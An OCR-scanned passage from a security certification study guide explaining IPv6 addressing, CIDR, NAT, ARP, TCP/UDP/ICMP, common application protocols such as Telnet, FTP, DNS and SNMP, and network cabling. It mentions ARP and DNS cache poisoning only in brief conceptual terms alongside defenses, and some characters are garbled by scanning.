TX packets: 10215 errors:© dropped:© overruns:© carrier:© 
collisions : 0 txqueuelen : 1000 

RX bytes: 18817254 (18.8 MB) TX bytes:654975 (654.9 KB) 
Interrupt: 19 Base address: 0 x 2000 


FIGURE 5.3 “ifconfig” Output Showing MAC address and IPv6 Addresses 
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Table 5.3 IPv6 Address Stateless Autoconfiguration 


MAC Address 


00 

0c 

29 

ef 

ii 

36 


Add “fffe” Constant 


00 

0c 

29 

ff 

fe 

ef 

11 

36 

Set Universal/Local Bit 


02 

0c 

29 

ff 

fe 

ef 

11 

36 


Add prefix & use format fc01:0000 : 0000:0000 : 020c:29ff :feef : 1136 


Convert repeating Os to fcOl : : 20c: 29ff : feef : 1136 


The second address (fe80::. . .) is a link-local address, used for local network commu- 
nication only. Systems assign link-local addresses independently, without the need for an 
IPv6 router advertisement. Even without any centralized IPv6 infrastructure (such as rout- 
ers sending IPv6 route advertisements), any IPv6 system will assign a link-local address, 
and can use that address to communicate to other link-local IPv6 addresses on the LAN. 

/64 is the network size in CIDR format: see “Classless Inter-Domain Routing” 
section, below. This means the network prefix is 64 bits long: the full global prefix is 
fc01:0000:0000:0000. 

The host in Figure 5.3 used the following process to statelessly configure its 
global address: 

• Take the MAC address: 00:0c:29:ef: 1 1 :36 

• Embed the “fffe” constant in the middle two bytes: 00:0c:29:ff:fe:ef: 11:36 

• Set the “Universal Bit”: 02:0c:29:ff:fe:ef: 1 1:36 

• Prepend the network prefix & convert to “:” format: fcO 1:0000 :0000:0000:020c: 
29ff:feef:l 136 

• Convert one string of repeating zeroes to fcOl :: 20c :29ff: feef: 1 136 
This process is shown in Table 5.3. 

Only one consecutive series of zeroes (shown in gray in the add prefix step shown 
in Table 5.3) may be summarized with The “fffe” constant is added to 48-bit 
MAC addresses to make them 64 bits long. Support for a 64-bit embedded MAC 
address ensures that the stateless autoconfiguration process is compatible with EUI- 
64 MAC addresses. The Universal/Local (U/L) bit is used to determine whether the 
MAC address is unique. Our MAC is unique, so the U/L bit is set. 

Stateless autoconfiguration removes the requirement for DHCP ( Dynamic Host 
Configuration Protocol, see DHCP section below), but DHCP may be used with 
IPv6: this is called “stateful autoconfiguration,” part of DHCPv6. IPv6’s much larger 
address space also makes NAT (Network Address Translation, see NAT section 
below) unnecessary, but various IPv6 NAT schemes have been proposed, mainly to 
allow easier transition from IPv4 to IPv6. 

Note that systems may be “dual stack” and use both IPv4 and IPv6 simultane- 
ously, as Figure 5.3 shows. That system uses IPv6, and also has the IPv4 address 
192.168.2.122. Hosts may also access IPv6 networks via IPv4; this is called tunnel- 
ing. Another IPv6 address worth noting is the loopback address: ::1. This is equiva- 
lent to the IPv4 address of 127.0.0.1. 


232 CHAPTER 5 Doma in 4: Communication and Network Security 


IPv6 Security Challenges 

IPv6 solves many problems, including adding sufficient address space and autocon- 
figuration, making routing much simpler. Some of these solutions, such as autocon- 
figuration, can introduce security problems. 

An IPv6-enabled system will automatically configure a link-local address (begin- 
ning with fe80:...) without the need for any other ipv6-enabled infrastructure. That 
host can communicate with other link-local addresses on the same LAN. This is true 
even if the administrators are unaware that IPv6 is now flowing on their network. 

ISPs are also enabling IPv6 service, sometimes without the customer’s knowl- 
edge. Modern network tools, such as network intrusion detection systems, can “see” 
IPv6, but are often not configured to do so. And many network professionals have 
limited experience or understanding of IPv6. From an attacker’s perspective, this can 
offer a golden opportunity to launch attacks or exfiltrate data via IPv6. 

All network services that are not required should be disabled: this is a fundamen- 
tal part of system hardening. If IPv6 is not required, it should be disabled. To disable 
IPv6 on a Windows host, open the network adapter, and choose properties. Then 
uncheck the “Internet protocol Version 6” box, as shown in Figure 5.4. 

Classful Networks 

The original IPv4 networks (before 1993) were “classful” classified in classes A 
through E. Class A through C were used for normal network use. Class D was multi- 
cast, and Class E was reserved. Table 5.4 shows the IP address range of each. 

Classful networks are inflexible: networks used for normal end hosts come in 
three sizes: 16,777,216 addresses (Class A), 65,536 addresses (Class B), and 256 
addresses (Class C). The smallest routable classful network is a Class C network 
with 256 addresses: a routable point-to-point link using classful networks requires a 
network between the two points, wasting over 250 IP addresses. 

Classless Inter-Domain Routing 

Classless Inter-Domain Routing (CIDR) allows far more flexible network sizes than 
those allowed by classful addresses. CIDR allows for many network sizes beyond the 
arbitrary classful network sizes. 

The Class A network 10.0.0.0 contains IP addresses that begins with 10: 
10.1.2.3.4, 10.187.24.8, 10.3.96.223, etc. In other words, 10.* is a Class A address. 
The first 8 bits of the dotted-quad IPv4 address is the network (10); the remaining 24 
bits are the host address: 3.96.223 in the last previous example. The CIDR notation 
for a Class A network is /8 for this reason: 10.0.0.0/8. The “/8” is the netmask, which 
means the network portion is 8 bits long, leaving 24 bits for the host. 

Similarly, the class C network of 192.0.2.0 contains any IP address that begins 
with 192.0.2: 192.0.2.177, 192.0.2.253, etc. That class C network is 192.0.2.0/24 in 
CIDR format: the first 24 bits (192.0.2) describe the network; the remaining 8 bits 
(177 or 253 in the previous example) describe the host. 

Once networks are described in CIDR notation, additional routable network sizes 
are possible. Need 128 IP addresses? Chop a Class C (/24) in half, resulting in 
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FIGURE 5.4 Disabling IPv6 on Windows 


two /25 networks. Need 64 IP addresses? Chop a /24 network into quarters, resulting 
in four /26 networks with 64 IP addresses each. 

RFC 1918 Addressing 

RFC 1918 addresses are private IPv4 addresses that may be used for internal traffic 
that does not route via the Internet. This allows for conservation of scarce IPv4 
addresses: countless intranets can use the same overlapping RFC 1918 addresses. 
Three blocks of IPv4 addresses are set aside for this purpose: 
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Table 5.4 

Classful Networks 

Class 

IP Range 

Class A 

0 . 0 . 0.0 - 

127 . 255 . 255.255 

Class B 

128 . 0 . 0.0 - 
191 . 255 . 255.255 

Class C 

192 . 0 . 0.0 - 
223 . 255 . 255.255 

Class D 
(multicast) 

224 . 0 . 0.0 - 
239 . 255 . 255.255 

Class E 
(reserved) 

240 . 0 . 0.0 - 
255 . 255 . 255.255 


• 10.0.0.0-10.255.255.255 (10.0.0.0/8) 

• 172.16.0.0-172.31.255.255 (172.16.0.0/12) 

• 192.168.0.0-192.168.255.255 (192.168.0.0/16) 

Any public Internet connection using un-translated RFC1918 addresses as a des- 
tination will fail: there are no public routes for these networks. Internet traffic sent 
with an un-translated RFC 1918 source address will never return. Using the classful 
terminology, the 10.0.0.0/8 network is a Class A network; the 172. 16.0. 0./12 network 
is 16 continuous Class B networks, and 192.168.0.0/16 is 256 Class C networks. 

RFC 1918 addresses are used to conserve public IPv4 addresses, which are in 
short supply. RFC stands for “Request for Comments,” a way to discuss and publish 
standards on the Internet. More information about RFC 1918 is available at: http:// 
www.rfc-editor.org/rfc/rfc 191 8.txt. 


NOTE 

Memorizing RFC numbers is not generally required for the exam; RFC 1918 addresses are 
an exception to that rule. The exam is designed to test knowledge of the universal language 
of information security. The term “RFC 1918 address” is commonly used among network 
professionals, and should be understood by information security professionals. 


Network Address Translation 

Network Address Translation (NAT) is used to translate IP addresses. It is frequently 
used to translate RFC 19 18 addresses as they pass from intranets to the Internet. If 
you were wondering how you could surf the public Web using a PC configured with 
a private RFC 1918 address, NAT is one answer (proxying is another). 

Three types of NAT are static NAT, pool NAT (also known as dynamic NAT), and 
Port Address Translation (PAT, also known as NAT overloading). Static NAT makes a 
one-to-one translation between addresses, such as 192.168.1.47— >192.0.2.252. Pool 
NAT reserves anumberof public IP addresses in apool, such as 192.0.2.10— >192.0.2.19. 
Addresses can be assigned from the pool, and then returned. Finally, PAT typically 
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Table 5.5 Types of NAT 


NAT Type 

Example 

Static 

192.168.1.47 -> 192.0.2.252 

Pool 

192.168.1.17 -> 192.0.2.10 
192.168.1.21 -> 192.0.2.11 
192.168.1.56 -> 192.0.2.12 

PAT 

192.168.1.* -> 192.0.2.20 


makes a many-to-one translation from multiple private addresses to one public IP 
address, such as 192.168.1.* to 192.0.2.20. PAT is a common solution for homes and 
small offices: multiple internal devices such as laptops, desktops and mobile devices 
share one public IP address. Table 5.5 summarizes examples of the NAT types. 

NAT hides the origin of a packet: the source address is the NAT gateway (usu- 
ally a router or a firewall), not of the host itself. This provides some limited security 
benefits: an attack against a system’s NAT-translated address will often target the 
NAT gateway, and not the end host. This protection is limited, and should never be 
considered a primary security control. Defense-in-depth is always required. 

NAT can cause problems with applications and protocols that change IP addresses 
or contain IP addresses in upper layers, such as the data layer of TCP/IP. IPsec, VoIP, 
and active FTP are among affected protocols. 

ARP and RARP 

ARP is the Address Resolution Protocol, used to translate between Layer 2 MAC 
addresses and Layer 3 IP addresses. ARP resolves IPs to MAC addresses by ask- 
ing, “Who has IP address 192.168.2.140, tell me.” An example of an ARP reply is 
“192.168.2.140 is at 00:0c:29:69: 19:66.” 


arp who-has 192.168.2.140 tell 192.168.2.4 
arp reply 192.168.2.140 is-at 00:0c:29:69: 19:66 


NOTE 

Protocols such as ARP are very trusting: attackers may use this to their advantage in hijacking 
traffic by spoofing ARP responses. Any local system could answer the ARP request, including an 
attacker. This can lead to ARP cache poisoning attacks, where victim systems cache bogus ARP 
entries that point to malicious systems. ARP cache poising is often used in Man-in-the-Middle 
(MitM) attacks, where an attacker frequently poisons the ARP entry for a critical system (such as 
the default gateway), redirecting traffic to the attacker’s system. 

Secure networks should consider hard-coding ARP entries for this reason. 
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RARP is used by diskless workstations to determine its IP address. A node asks 
“Who has MAC address at 00:40:96:29:06:51, tell 00:40:96:29:06:51. 

ARP, Reverse Request who-is 00:40:96:29:06:51 tell 00:40:96:29:06:51 

In other words RARP asks: “Who am I? Tell me.” A RARP server answers with 
the node’s IP address. 

Unicast, Multicast, and Broadcast Traffic 

Unicast is one-to-one traffic, such as a client surfing the Web. Multicast is one-to- 
many, and the “many” is preselected. Broadcast is one-to-all on a LAN. 

Multicast traffic uses “Class D” addresses when used over IPv4. Nodes are placed 
into multicast groups. A common multicast application is streaming audio or video. 
Sending 1000 audio streams via unicast would require a large amount of bandwidth, 
so multicast is used. It works like a tree: the initial stream is the trunk, and each 
member of the multicast group a leaf. One stream is sent from the streaming server, 
and it branches on the network as it reaches routers with multiple routes for nodes in 
the multicast group. Multicast typically uses UDP. 

Limited and Directed Broadcast addresses 

Broadcast traffic is sent to all stations on a LAN. There are two types of IPv4 broad- 
cast addresses: limited broadcast and directed broadcast. The limited broadcast 
address is 255.255.255.255. It is “limited” because it is never forwarded across a 
router, unlike a directed broadcast. 

The directed (also called net-directed) broadcast address of the 192.0.2.0/24 net- 
work is 192.0.2.255 (the host portion of the address is all “l”s in binary, or 255). It 
is called “directed” broadcast, because traffic to these addresses may be sent from 
remote networks (it may be “directed”). 

Layer 2 Broadcast Traffic 

Layer 2 broadcast traffic reaches all nodes in a “broadcast domain.” Devices on the 
same LAN (or VLAN) are in the same broadcast domain. The Ethernet broadcast 
address is MAC address “FF:FF:FF:FF:FF:FF”: traffic sent to that address on an 
Ethernet switch is received by all connected nodes. 

Promiscuous Network Access 

Accessing all unicast traffic on a network segment requires “ promiscuous ” network 
access. Systems such as Network Intrusion Detection Systems (NIDS) require pro- 
miscuous network access in order to monitor all traffic on a network. Network nodes 
normally only “see” unicast traffic sent directly to them. Accessing unicast traffic sent 
to other nodes requires two things: a network interface card (NIC) configured in pro- 
miscuous mode, and the ability to access other unicast traffic on a network segment. 

Placing a NIC in promiscuous mode normally requires super-user access, such as 
the root user on a UNIX system. Devices such as switches provide traffic isolation. 
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0 12 3 

01234567890123456789012345678901 

1 --+-+ 

| Source Port | Destination Port | 

| Sequence Number I 

| Acknowledgment Number I 

+-+-+-+-+— I— I— +-+-+-+-+-+— 1~+-+— I— I—I—+— I— +-+-+-+ 
| Data | |U|A|P|R|S|F| I 

| Offset | Reserved |R|C|S|S|Y|I| Window | 

| | |G|K|H|T|N|N| | 

| Checksum | Urgent Pointer | 

| Options | Padding | 

| data | 

FIGURE 5.5 TCP Packet [5] 


so that each host will only receive unicast traffic sent to it (in addition to broadcast 
and multicast traffic). As we will see in a later section, a hub, switch SPAN port, or 
TAP is typically used to provide promiscuous network access. 

TCP 

TCP is the Transmission Control Protocol, a reliable Layer 4 protocol. TCP uses 
a three-way handshake to create reliable connections across a network. TCP can 
reorder segments that arrive out of order, and retransmit missing segments. 

Key TCP Header Fields 

A TCP header, shown in Figure 5.5, is 20 bytes long (with no options), and contains 
a number of fields. Important fields include: 

• Source and Destination port 

• Sequence and Acknowledgment Numbers: Keep full-duplex communication in 
sync 

• TCP Flags 

• Window Size: Amount of data that may be sent before receiving 
acknowledgment 

TCP ports 

TCP connects from a source port to a destination port, such as from source port 
51178 to destination port 22. The TCP port field is 16 bits, allowing port numbers 
from 0 to 65535. 

There are two types of ports: reserved and ephemeral. A reserved port is 1023 or 
lower; ephemeral ports are 1024-65535. Most operating systems require super-user 
privileges to open a reserved port. Any user may open an (unused) ephemeral port. 
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root@ubuntu:~# netstat -nat 

Active Internet connections (servers and established) 

Proto Recv-Q Send-Q Local Address Foreign Address 

tcp 0 01?7.fl.fl. 1:611 fl.fl.fl.fl:- 

tcp 0 0 192.168.80.144:51178 192.168.2.4:22 


FIGURE 5.6 TCP Socket Pair 


State 

LISTEN 

ESTABLISHED 


Common services such as HTTP use well-known ports. The Internet Assigned 
Numbers Authority (IANA) maintains a list of well-known ports at http://www.iana. 
org/assignments/port-numbers. Most Linux and UNIX systems have a smaller list of 
well-known ports in /etc/services. 

Socket Pairs 

A socket is a combination of an IP address and a TCP or UDP port on one node. A 
socket pair describes a unique connection between two nodes: source port, source IP, 
destination port, and destination IP. The netstat output in Figure 5.6 shows a socket 
pair between source IP 192.168.80.144, TCP source port 51178, and destination IP 
192.168.2.4, destination TCP port 22. 

A socket may “listen” (wait for a connection); a listening socket is shown as 
127.0.0.1:631 in Figure 5.6. A socket pair is then “established” during a connection. 
You may have multiple connections from the same host (such as 192.168.80.144), 
to the same host (192.168.2.4), and even to the same port (22). The OS and interme- 
diary devices such as routers are able to keep these connections unique due to the 
socket pairs. In the previous example, two connections from the same source IP and 
to the same IP/destination port would have different source ports, making the socket 
pairs (and connections) unique. 

TCP Flags 

The original six TCP flags are: 

• URG: Packet contains urgent data 

• ACK: Acknowledge received data 

• PSH: Push data to application layer 

• RST: Reset (tear down) a connection 

• SYN: Synchronize a connection 

• FIN: Finish a connection (gracefully) 

Two new TCP flags were added in 2001: CWR (Congestion Window Reduced) 
and ECE (Explicit Congestion Notification Echo), using formerly reserved bits in 
the TCP header. A third new flag was added in 2003: NS (Nonce Sum). These flags 
are used to manage congestion (slowness) along a network path. All 9 TCP flags are 
shown in Figure 5.7. 

The TCP handshake 

TCP uses a three-way handshake to establish a reliable connection. The connection is 
full duplex, and both sides synchronize (SYN) and acknowledge (ACK) each other. 
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0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 


|N|C|E|U|A|P|R|S|F| 

| Header Length | Reserved |s|w|c|r|c|s|s|y|i| 

I I I |R|E|G|K|H|T|N|N| 

+ + + + + + + + + + + + + + + + + 

FIGURE 5.7 Nine TCP Flags [6] 


The exchange of these four flags is performed in three steps: SYN, SYN-ACK, ACK, 
as shown in Figure 5.8. 

The client chooses an initial sequence number, set in the first SYN packet. The 
server also chooses its own initial sequence number, set in the SYN/ACK packet 
shown in Figure 5.8. Each side acknowledges each other’s sequence number by 
incrementing it: this is the acknowledgement number. The use of sequence and 
acknowledgement numbers allows both sides to detect missing or out-of-order seg- 
ments. 

Once a connection is established, ACKs typically follow for each segment. The 
connection will eventually end with a RST (reset or tear down the connection) or FIN 
(gracefully end the connection). 

UDP 

UDP is the User Datagram Protocol, a simpler and faster cousin to TCP. UDP has 
no handshake, session, or reliability: it is informally called “Send and Pray” for this 
reason. UDP has a simpler and shorter 8-byte header (shown in Figure 5.9), com- 
pared to TCP’s default header size of 20 bytes. UDP header fields include source 
port, destination port, packet length (header and data), and a simple (and optional) 
checksum. If used, the checksum provides limited integrity to the UDP header and 
data. Unlike TCP, data usually is transferred immediately, in the first UDP packet. 
UDP operates at Layer 4. 

UDP is commonly used for applications that are “lossy” (can handle some packet 
loss), such as streaming audio and video. It is also used for query-response applica- 
tions, such as DNS queries. 


Client Server 



FIGURE 5.8 TCP Three-Way Handshake 
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| data octets . . . 


FIGURE 5.9 UDP Packet [7] 


ICMP 

ICMP is the Internet Control Message Protocol, a helper protocol that helps Layer 
3 (IP, see note). ICMP is used to troubleshoot and report error conditions: Without 
ICMP to help, IP would fail when faced with routing loops, ports, hosts, or networks 
that are down, etc. ICMP has no concept of ports, as TCP and UDP do, but instead 
uses types and codes. Commonly used ICMP types are echo request and echo reply 
(used for ping) and time to live exceeded in transit (used for traceroute). 


NOTE 

“Which protocol runs at which layer” is often a subject of fierce debate. We call this the “bucket 
game.” For example, which bucket does ICMP go into: Layer 3 or Layer 4? ICMP headers are at 
Layer 4, just like TCP and UDP, so many will answer “Layer 4.” Others argue ICMP is a Layer 3 
protocol, since it assists IP (a Layer 3 protocol), and has no ports. 

This shows how arbitrary the bucket game is: a packet capture shows the ICMP header at Layer 
4, so many network engineers will want to answer “Layer 4:” never argue with a packet. The same 
argument exists for many routing protocols: for example, BGP is used to route at Layer 3, but BGP 
itself is carried by TCP (and IP). This book will cite clear-cut bucket game protocol/layers in the 
text and self tests, but avoid murkier examples (just as the exam should). 


Ping 

Ping (named after sonar used to “ping” submarines) sends an ICMP Echo Request to 
a node and listens for an ICMP Echo Reply. Ping was designed to determine whether 
a node is up or down. 

Ping was a reliable indicator of a node’s status on the ARPAnet or older Internet, 
when firewalls were uncommon (or did not exist). Today, an ICMP Echo Reply is a 
fairly reliable indicator that a node is up. Attackers use ICMP to map target networks, 
so many sites filter types of ICMP such as Echo Request and Echo Reply. 

An unanswered ping (an ICMP Echo Request with no Echo Reply) does not 
mean a host is down. The node may be down, or the node may be up and the Echo 
Request or Echo Reply may have been filtered at some point. 
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Traceroute client Router A Router B Router 3 Server 



Traceroute 

The traceroute command uses ICMP Time Exceeded messages to trace a network 
route. As discussed during IP, the Time to Live field is used to avoid routing loops: 
every time a packet passes through a router, the router decrements the TTL field. If 
the TTL reaches zero, the router drops the packet and sends an ICMP Time Exceeded 
message to the original sender. 

Traceroute takes advantage of this TTL feature in a clever way. Assume a 
client is four hops away from a server: the client’s traceroute client sends a packet 
to the server with a TTL of 1 . The router A decrements the TTL to 0, drops the 
packet, and sends an ICMP Time Exceeded message to the client. Router A is now 
identified. 

The client then sends a packet with a TTL of 2 to the server. Router A decrements 
the TTL to 1 and passes the packet to router B. Router B decrements the TTL to 0, 
drops it, and sends an ICMP Time Exceeded message to the client. Router B is now 
identified. This process continues until the server is reached, as shown in Figure 5.10, 
identifying all routers along the route. 

Most traceroute clients (such as UNIX and Cisco) send UDP packets outbound. 
The outbound packets will be dropped, so the protocol does not matter. The Windows 
tracert client sends ICMP packets outbound; Figure 5.11 shows Windows tracert out- 
put for a route to www.syngress.com. Both client types usually send three packets for 
each hop (the three “ms” columns in the Figure 5.11 output). 


APPLICATION LAYER TCP/IP PROTOCOLS AND CONCEPTS 

A multitude of protocols exist at TCP/IP’s Application Layer, which combines the 
Session, Presentation, and Application Layers of the OSI model. 
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C:\Users\eric>tracert -d www.syngress.con 
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ns 
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13 
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ns 

154.54.28.146 
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ns 
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ns 

66.33.201.115 

16 
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ns 
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ns 

203 

ns 

69.163.177.2 


Trace conplete. 
C:\Users\eric >_ 


FIGURE 5.1 1 Windows tracert to www.syngress.com 


Telnet 

Telnet provides terminal emulation over a network. “Terminal” means text-based 
VT 100-style terminal access. Telnet servers listen on TCP port 23. Telnet was 
the standard way to access an interactive command shell over a network for over 
20 years. 

Telnet is weak because it provides no confidentiality; all data transmitted during a 
telnet session is plaintext, including the username and password used to authenticate 
to the system. Attackers who are able to sniff network traffic can steal authentication 
credentials this way. 

Telnet also has limited integrity: attackers with write access to a network can alter 
data, or even seize control of Telnet sessions. Secure Shell (SSH) provides secure 
authentication, confidentiality, and integrity and is a recommended replacement for 
Telnet. 

FTP 

FTP is the File Transfer Protocol, used to transfer files to and from servers. Like 
Telnet, FTP has no confidentiality or integrity and should not be used to transfer 
sensitive data over insecure channels. 


NOTE 

When discussing insecure protocols such as Telnet and FTP, statements like “no confidentiality” 
assume that they are used with default settings, with no additional hardening or encryption (such as 
using them via an IPsec VPN tunnel). You may mitigate the lack of confidentiality by using Telnet 
or FTP over an encrypted VPN tunnel or using SSH in their place, among other options. Also, “no 
integrity” means there is limited or no integrity at the application layer: some integrity may be 
provided at a lower layer, such as the transport layer. 
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FTP uses two ports: the control connection (where commands are sent) is TCP 
port 21; “Active FTP” uses a data connection (where data is transferred) that origi- 
nates from TCP port 20. Here are the two socket pairs (the next two examples use 
arbitrary ephemeral ports): 

• Client: 1025— >Server:21 (Control Connection) 

• Server: 20— ^Client: 1026 (Data Connection) 

Notice that the data connection originates from the server, in the opposite 
direction of the control channel. This breaks classic client-server data flow direction. 
Many firewalls will block the active FTP data connection for this reason, breaking 
Active FTP. Passive FTP addresses this issue by keeping all communication from 
client to server: 

• Client: 1025— >Server:21 (Control Connection) 

• Client 1026— ^Server: 1025 (Data Connection) 

The FTP server tells the client which listening data connection port to connect 
to; the client then makes a second connection. Passive FTP is more likely to pass 
through firewalls cleanly, since it flows in classic client-server direction. 

TFTP 

TFTP is the Trivial File Transfer Protocol, which runs on UDP port 69. It provides 
a simpler way to transfer files and is often used for saving router configurations or 
“bootstrapping” (downloading an operating system) via a network by diskless work- 
stations. 

TFTP has no authentication or directory structure: files are read from and written 
to one directory, usually called /tftpboot. There is also no confidentiality or integrity. 
Like Telnet and FTP, TFTP is not recommended for transferring sensitive data over 
an insecure channel. 

SSH 

SSH was designed as a secure replacement for Telnet, FTP, and the UNIX “R” com- 
mands (rlogin, rshell, etc). It provides confidentiality, integrity, and secure authen- 
tication, among other features. SSH includes SFTP (SSH FTP) and SCP (Secure 
Copy) for transferring files. SSH can also be used to securely tunnel other protocols, 
such as HTTP. SSH servers listen on TCP port 22 by default. 

SSH version 1 was the original version, which has since been found vulnerable to 
man-in-the middle attacks. SSH version 2 is the current version of the protocol, and 
is recommended over SSHvl, or Telnet, FTP, etc. 

SMTP, POP and IMAP 

SMTP is the Simple Mail Transfer Protocol, used to transfer email between servers. 
SMTP servers listen on TCP port 25. POPv 3 (Post Office Protocol) and IMAP 
(Internet Message Access Protocol) are used for client-server email access, which 
use TCP ports 1 10 and 143, respectively. 
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DNS 

DNS is the Domain Name System, a distributed global hierarchical database that 
translates names to IP addresses, and vice versa. DNS uses both TCP and UDP: small 
answers use UDP port 53; large answers (such as zone transfers) use TCP port 53. 

Two core DNS functions are gethostbyname() and gethostbyaddr(). Given a 
name (such as www.syngress.com), gethostbyname returns an IP address, such as 
192.0.2.187. Given an address such as 192.0.2.187, gethostbyaddr returns the name, 
www.syngress.com. 

Authoritative name servers provide the “authoritative” resolution for names with- 
in a given domain. A recursive name server will attempt to resolve names that it does 
not already know. A caching name server will temporarily cache names previously 
resolved. 

DNS Weaknesses 

DNS uses the unreliable UDP protocol for most requests, and native DNS provides 
no authentication. The security of DNS relies on a 16-bit source port and 16-bit DNS 
query ID. Attackers who are able to blindly guess both numbers can forge UDP DNS 
responses. 

A DNS cache poisoning attack is an attempt to trick a caching DNS server into 
caching a forged response. Ifbank.example.com is at 192.0.2.193, and evil. example, 
com is at 198.18.8.17, an attacker may try to poison a DNS server’s cache by sending 
the forged response of “bank.example.com is at 198.18.8.17.” If the caching DNS 
name server accepts the bogus response, it will respond with the poisoned response 
for subsequent bank.example.com requests (until the record expires). 

DNSSEC 

DNSSEC (Domain Name Server Security Extensions) provides authentication and 
integrity to DNS responses via the use of public key encryption. Note that DNSSEC 
does not provide confidentiality: it acts like a digital signature for DNS responses. 

Building an Internet-scale Public Key Infrastructure is a difficult task, and DNS- 
SEC has been slowly adopted for this reason. Security researcher Dan Kaminsky pub- 
licized an improved DNS cache poisoning attack in 2008, which has led to renewed 
calls for wider adoption of DNSSEC. See http://www.kb.cert.org/vuls/id/8001 13 for 
more details on the improved cache poisoning attack and defenses. 

SNMP 

SNMP is the Simple Network Management Protocol, primarily used to monitor net- 
work devices. Network monitoring software such as HP Open View and MRTG use 
SNMP to poll SNMP agents on network devices, and report interface status (up/ 
down), bandwidth utilization, CPU temperature, and many more metrics. SNMP 
agents use UDP port 161. 

SNMPv 1 and v2c use read and write community strings to access network devices. 
Many devices use default community strings such as “public” for read access, and 
“private” for write access. Additionally, these community strings are usually changed 
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infrequently (if at all), and are typically sent in the clear across a network. An 
attacker who can sniff or guess a community string can access the network device via 
SNMP. Access to a write string allows remote changes to a device, including shutting 
down or reconfiguring interfaces, among many other options. 

SNMPv3 was designed to provide confidentiality, integrity, and authentication to 
SNMP via the use of encryption. While SNMPv2c usage remains highly prevalent, 
use of SNMPv3 is strongly encouraged due to the lack of security in all previous 
versions. 

HTTP and HTTPS 

HTTP is the Hypertext Transfer Protocol, which is used to transfer unencrypted Web- 
based data. HTTPS (Hypertext Transfer Protocol Secure) transfers encrypted Web- 
based data via SSL /TLS (see SSL/TLS section, below). HTTP uses TCP port 80, and 
HTTPS uses TCP port 443. HTML (Hypertext Markup Language) is used to display 
Web content. 


NOTE 


HTTP and HTML are often confused. The difference: you transfer Web data via HTTP, and view it 
via HTML. 


BOOTP and DHCP 

BOOT 'P is the Bootstrap Protocol, used for bootstrapping via a network by diskless 
systems. Many system BIOSs now support BOOTP directly, allowing the BIOS to 
load the operating system via a network without a disk. BOOTP startup occurs in two 
phases: use BOOTP to determine the IP address and OS image name, and then use 
TFTP to download the operating system. 

DHCP (Dynamic Host Configuration Protocol) was designed to replace and im- 
prove on BOOTP by adding additional features. DHCP allows more configuration 
options, as well as assigning temporary IP address leases to systems. DHCP systems 
can be configured to receive IP address leases, DNS servers, and default gateways, 
among other information. 

Both BOOTP and DHCP use the same ports: UDP port 67 for servers and UDP 
port 68 for clients. 

LAYER 1 NETWORK CABLING 

The simplest part of the OSI model is the part you can touch: network cables, at 
Layer 1 . It is important to understand the types of cabling that are commonly used, 
and the benefits and drawbacks of each. 

Fundamental network cabling terms to understand include EMI, noise, crosstalk, 
and attenuation. Electro Magnetic Interference (EMI) is interference caused by mag- 
netism created by electricity. Any unwanted signal (such as EMI) on a network cable 
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FIGURE 5.12 UTP Cable 

Source: http://upload.wikimedia.0rg/wikipedia/commons/c/cb/UTP_cable.jpg. Image by Baran Ivo. Image 

under permission of Creative Commons 


is called noise. Crosstalk occurs when a signal crosses from one cable to another. 
Attenuation is the weakening of signal as it travels further from the source. 

Twisted Pair Cabling 

Unshielded Twisted Pair (UTP) network cabling, shown in Figure 5.12, uses pairs of 
wire twisted together. All electricity creates magnetism; taking two wires that send elec- 
tricity in opposite direction (such as sending and receiving) and twisting them together 
dampens the magnetism. This makes Twisted Pair cabling less susceptible to EMI. 

Twisted pair cables are classified by categories according to rated speed. Tighter 
twisting results in more dampening: a Category 6 UTP cable designed for gigabit 
networking has far tighter twisting than a Category 3 fast Ethernet cable. Table 5.6 
summarizes the types and speeds of Category cabling. Cisco Press also has a good 
summary at http://www.ciscopress. com/articles/article. asp ?p=3 1276. 


Table 5.6 Category Cabling Speed and Usage 


Category 

Speed (Mbps) 

Common use 

Cat 1 

< 1 

Analog voice 

Cat 2 

4 

ARCNET 

Cat 3 

10 

lObaseT Ethernet 

Cat 4 

16 

Token Ring 

Cat 5 

100 

lOObaseT Ethernet 

Cat 5e 

1000 

lOOObaseT Ethernet 

Cat 6 

1000 

lOOObaseT Ethernet 
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Shielded Twisted Pair (STP) contains additional metallic shielding around each 
pair of wires. This makes STP cables less susceptible to EMI, but more rigid and 
more expensive. 


NOTE 

Many of us know Cat3 and Cat5 from hands-on use. Are you having a hard time remembering 
the obscure category cabling levels, such as 1,2, and 4? Just remember that Catl is the simplest 
and slowest, used for analog voice. Cat2 is 4 megabits, and Cat4 is 16: remember the squares. 
Two times two is four, and four times four is sixteen. Also, Catl and Cat2 are informal names: 
the official category cabling standard begins at Category 3. So the exam is less likely to ask about 
Catl and Cat2. 


Coaxial Cabling 

A coaxial network cable, shown in Figure 5.13, has an inner copper core (marked 
“D”) separated by an insulator (marked “C”) from a metallic braid or shield (marked 
“B”). The outer layer is a plastic sheath (marked “A”). The insulator prevents the core 
from touching the metallic shield, which would create an electrical short. Coaxial 
cables are often used for satellite and cable TV service. 

The core and shield used by coaxial cable are thicker and better insulated than 
other cable types, such as twisted pair. This makes coaxial more resistant to EMI and 
allows higher bandwidth and longer connections compared with twisted pair cable. 

Two older types of coaxial cable are Thinnet and Thicknet, used for Ethernet bus 
networking. 



Source: http://commons.wikimedia.Org/wiki/File:RG-59.jpg.lmage by Arj. Image under permission of Creative 

Commons 
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Fiber Optic Network Cable 

Fiber Optic network cable (simply called “fiber”) uses light to carry information, 
which can carry a tremendous amount of information. Fiber can be used to transmit 
via long distances: past 50 miles, much further than any copper cable such as twisted 
pair or coaxial. Fiber’s advantages are speed, distance, and immunity to EMI. Disad- 
vantages include cost and complexity. 

Multimode fiber carrier uses multiple modes (paths) of light, resulting in light 
dispersion. Single-mode fiber uses a single strand of fiber, and the light uses one 
mode (path) down the center of the fiber. Multimode fiber is used for shorter dis- 
tances; single-mode fiber is used for long haul, high-speed networking. 

Multiple signals may be carried via the same fiber via the use of Wavelength 
Division Multiplexing (WDM), where multiple light “colors” are used to transmit 
different channels of information via the same fiber. Combined speeds of over a 
terabit/second can be achieved when WDM is used to carry 10-gigabits per color. 

LAN TECHNOLOGIES AND PROTOCOLS 

Local Area Network concepts focus on layer 1-3 technologies such as network 
cabling types, physical and logical network topologies, Ethernet, FDDI, and others. 

Ethernet 

Ethernet is a dominant local area networking technology that transmits network data 
via frames. It originally used a physical bus topology, but later added support for 
physical star. Ethernet describes Layer 1 issues such as physical medium and Layer 
2 issues such as frames. Ethernet is baseband (one channel), so it must address issues 
